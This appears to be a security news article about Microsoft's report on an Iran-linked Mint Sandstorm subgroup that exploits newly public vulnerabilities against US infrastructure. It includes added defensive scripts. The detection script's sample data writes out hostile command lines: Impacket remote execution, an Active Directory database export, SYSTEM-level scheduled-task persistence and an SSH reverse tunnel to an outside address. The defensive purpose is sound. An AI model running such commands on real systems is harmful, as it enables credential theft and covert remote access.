Microsoft: Iranian Hackers Moved From Recon to Targeting US Critical Infrastructure

A subgroup of Iran-linked APT Phosphorus (Mint Sandstorm) has started to quickly adopt PoC exploit code targeting vulnerabilities in internet-facing applications.

A subgroup of Iran-linked advanced persistent threat (APT) actor Mint Sandstorm has started to quickly adopt proof-of-concept (PoC) exploit code targeting vulnerabilities in internet-facing applications, Microsoft warns.

The nation-state group is known as TA453, Ajax Security Team, Charming Kitten, APT35, Magic Hound, NewsBeef, Newscaster, and Phosphorus, and now Mint Sandstorm, per Microsoft’s updated threat actor naming taxonomy.

Active since at least 2011, Mint Sandstorm has been observed targeting activists, government entities, journalists, critical infrastructure, and other entities.

According to Microsoft, there are several subgroups operating under Mint Sandstorm, but the overall activity can be associated with the Islamic Revolutionary Guard Corps (IRGC), Iran’s military intelligence arm.

One of these subgroups, the tech giant says, has specialized in compromising high-value targets for information theft, and was recently observed quickly adopting PoC code for known vulnerabilities.

Initially focused on performing reconnaissance, the subgroup transitioned to directly targeting critical infrastructure organizations in the United States in 2022, including energy companies, seaports, transit systems, and a major utility and gas company. These attacks were “potentially in support of retaliatory destructive cyberattacks,” Microsoft said.

Earlier this year, the Mint Sandstorm subgroup was seen adopting PoC exploitation code for N-day vulnerabilities quickly after they were publicly disclosed. Previously, the threat actor took weeks to weaponize exploits for vulnerabilities such as ProxyShell and Log4Shell.


“For example, Mint Sandstorm began exploiting CVE-2022-47966 in Zoho ManageEngine on January 19, 2023, the same day the POC became public. They later exploited CVE-2022-47986 in Aspera Faspex within five days of the POC being made public on February 2, 2023,” Microsoft reports.

The tech giant warns that Mint Sandstorm continues to exploit older vulnerabilities for initial compromise, mostly as part of ‘opportunistic and indiscriminate’ activity, which underlines the need to apply patches for known vulnerabilities in a timely manner.
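The report's own numbers make the exposure window concrete: the PoC for CVE-2022-47966 was public on January 19, 2023 and exploited the same day, and CVE-2022-47986 was exploited within five days of its PoC appearing on February 2, 2023. The following script is an added example, not code from Microsoft or SecurityWeek: it takes those two PoC dates from the article and a constructed asset inventory (hostnames and patch dates are invented) and reports how many days each asset sat reachable with a public PoC available, so a patch team can see which backlog items already exceed the budget the actor's tempo allows.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Public-PoC dates as stated in the Microsoft report quoted in the article.
POC_PUBLIC = {
    "CVE-2022-47966": date(2023, 1, 19),   # Zoho ManageEngine
    "CVE-2022-47986": date(2023, 2, 2),    # IBM Aspera Faspex
}


@dataclass
class Asset:
    name: str
    cve: str
    patched_on: Optional[date]   # None means the fix is still not applied


# Constructed inventory: hostnames and patch dates are invented for the example.
INVENTORY = [
    Asset("mgmt-engine-01", "CVE-2022-47966", date(2023, 1, 25)),
    Asset("mgmt-engine-02", "CVE-2022-47966", None),
    Asset("faspex-dmz", "CVE-2022-47986", date(2023, 2, 4)),
]


def exposure_report(inventory, poc_public, as_of):
    """Days each asset was exposed with a public PoC available: from PoC
    publication until the patch date, or until `as_of` if still open.
    Open items are listed first, then longest exposure first."""
    rows = []
    for asset in inventory:
        poc_date = poc_public[asset.cve]
        end = asset.patched_on or as_of
        days = max(0, (end - poc_date).days)
        rows.append({
            "asset": asset.name,
            "cve": asset.cve,
            "status": "patched" if asset.patched_on else "open",
            "exposure_days": days,
        })
    return sorted(rows, key=lambda r: (r["status"] != "open", -r["exposure_days"]))


def over_budget(report, max_days):
    """Assets whose exposure window exceeded the allowed number of days."""
    return [r["asset"] for r in report if r["exposure_days"] > max_days]


if __name__ == "__main__":
    report = exposure_report(INVENTORY, POC_PUBLIC, as_of=date(2023, 2, 10))
    for row in report:
        print(f"{row['asset']:<16} {row['cve']:<15} {row['status']:<8} {row['exposure_days']:>3} days")
    # A weeks-long budget would have been fine against the actor's earlier tempo;
    # against same-day exploitation only a budget near zero is meaningful.
    print("over a 7-day budget:", over_budget(report, 7))
```

The `as_of` parameter is passed explicitly rather than read from the clock so the report is reproducible in a ticket or an audit trail.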

Following initial compromise, the Mint Sandstorm subgroup deploys a custom PowerShell script for discovery, followed by lateral movement using Impacket, and the deployment of additional tools.

In some attacks, the subgroup uses PowerShell scripts for account enumeration and RDP connections, together with an SSH tunnel for command-and-control (C&C), to steal the victim’s Active Directory database, compromise user credentials, and access user accounts.

In other attacks, the subgroup created scheduled tasks for persistence and C&C, and deployed custom malware.

Since 2022, the threat actor has been observed using two custom implants, namely Drokbk (a .NET implant consisting of an installer and a backdoor) and Soldier (a multistage .NET backdoor that can fetch additional payloads and uninstall itself).
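The post-compromise chain described above (PowerShell discovery and account enumeration, Impacket lateral movement, scheduled tasks for persistence, an SSH tunnel for C&C, and theft of the Active Directory database) is visible in process-creation telemetry. The script below is an added example, not code from Microsoft or the article: it runs a handful of detection rules over constructed Windows process-creation records (hostnames, users, paths and the 203.0.113.10 address are invented; nothing here is an indicator from the report). The article does not name the exact tooling behind each step, so the rules assume the commonly observed forms: the `1> \\127.0.0.1\ADMIN$\__` output redirection that Impacket's wmiexec leaves in command lines, `ntdsutil ... ifm` or direct `ntds.dit` access for the database theft, `schtasks /Create` writing to a user-writable path or running as SYSTEM, and `ssh -R`/`-D` for the tunnel. Hosts on which more than one stage fires are escalated.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Windows Security 4688 / Sysmon Event 1 style)."""
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# Constructed sample telemetry for the example; not real incident data.
SAMPLE_EVENTS = [
    ProcEvent("DC01", "CORP\\svc-backup", "C:\\Windows\\System32\\WmiPrvSE.exe",
              "C:\\Windows\\System32\\cmd.exe",
              'cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1681231234.56 2>&1'),
    ProcEvent("FS02", "CORP\\jdoe", "C:\\Windows\\explorer.exe",
              "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              'powershell.exe -c "Get-ADUser -Filter * | Select SamAccountName"'),
    ProcEvent("DC01", "CORP\\svc-backup", "C:\\Windows\\System32\\cmd.exe",
              "C:\\Windows\\System32\\ntdsutil.exe",
              'ntdsutil.exe "ac i ntds" "ifm" "create full C:\\Temp\\x" q q'),
    ProcEvent("WS17", "CORP\\jdoe", "C:\\Windows\\System32\\cmd.exe",
              "C:\\Windows\\System32\\schtasks.exe",
              'schtasks.exe /Create /SC MINUTE /MO 30 /TN "Updater" /TR C:\\Users\\Public\\u.exe /RU SYSTEM'),
    ProcEvent("WS17", "CORP\\jdoe", "C:\\Users\\Public\\u.exe",
              "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
              'ssh.exe -N -R 9000:localhost:3389 user@203.0.113.10 -p 443'),
    ProcEvent("WS17", "CORP\\jdoe", "C:\\Windows\\explorer.exe",
              "C:\\Windows\\System32\\notepad.exe", "notepad.exe notes.txt"),
]

# (rule name, MITRE ATT&CK technique id, predicate over one ProcEvent)
RULES = [
    # Impacket wmiexec: WMI provider host spawns cmd.exe whose output is
    # redirected to the ADMIN$ share on loopback.
    ("impacket_wmiexec_pattern", "T1047",
     lambda e: e.parent.lower().endswith("wmiprvse.exe")
     and re.search(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__", e.cmdline) is not None),
    # PowerShell used to enumerate domain accounts.
    ("powershell_account_enumeration", "T1087.002",
     lambda e: e.image.lower().endswith("powershell.exe")
     and re.search(r"Get-ADUser|Get-ADComputer|net\s+user\s+/domain", e.cmdline, re.I) is not None),
    # Active Directory database export or direct access to ntds.dit.
    ("ad_database_access", "T1003.003",
     lambda e: re.search(r"ntdsutil.*\bifm\b|ntds\.dit", e.cmdline, re.I) is not None),
    # Scheduled task created that runs as SYSTEM or from a user-writable path.
    ("scheduled_task_persistence", "T1053.005",
     lambda e: e.image.lower().endswith("schtasks.exe")
     and re.search(r"/create", e.cmdline, re.I) is not None
     and re.search(r"/RU\s+SYSTEM|\\Users\\Public\\|\\Temp\\", e.cmdline, re.I) is not None),
    # SSH client opening a reverse (-R) or dynamic (-D) tunnel.
    ("ssh_reverse_tunnel", "T1572",
     lambda e: e.image.lower().endswith("ssh.exe")
     and re.search(r"\s-[RD]\s", e.cmdline) is not None),
]


def detect(events):
    """Apply every rule to every event; return one finding per rule hit."""
    findings = []
    for event in events:
        for name, technique, predicate in RULES:
            if predicate(event):
                findings.append({"host": event.host, "user": event.user, "rule": name,
                                 "technique": technique, "cmdline": event.cmdline})
    return findings


def hosts_with_multiple_stages(findings, min_stages=2):
    """Hosts where at least `min_stages` distinct rules fired. A single hit can
    be an admin at work; discovery plus persistence plus tunnelling on one host
    is the chain the report describes and is worth escalating."""
    rules_by_host = {}
    for finding in findings:
        rules_by_host.setdefault(finding["host"], set()).add(finding["rule"])
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= min_stages)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:<5} {f['rule']:<32} {f['technique']:<10} {f['cmdline']}")
    print("escalate:", hosts_with_multiple_stages(hits))
```

The per-host aggregation is the part that matters in practice: `ntdsutil ifm` alone is also what a legitimate domain-controller backup looks like, so the rule output is only a lead until it is joined with other stages on the same host or with the account and time of day.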

In some instances, the subgroup was observed relying on low-volume phishing campaigns to target “individuals affiliated with high-profile think tanks or universities in Israel, North America, or Europe with ties to the security and policy communities” with malicious documents leading to the CharmPower modular backdoor.

“Capabilities observed in intrusions attributed to this Mint Sandstorm subgroup are concerning as they allow operators to conceal C&C communication, persist in a compromised system, and deploy a range of post-compromise tools,” Microsoft concludes.

Related: UK Gov Warns of Phishing Attacks Launched by Iranian, Russian Cyberspies

Related: Microsoft Dives Into Iranian Ransomware APT Attacks

Related: Iranian Cyberspy Group Launching Ransomware Attacks Against US

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
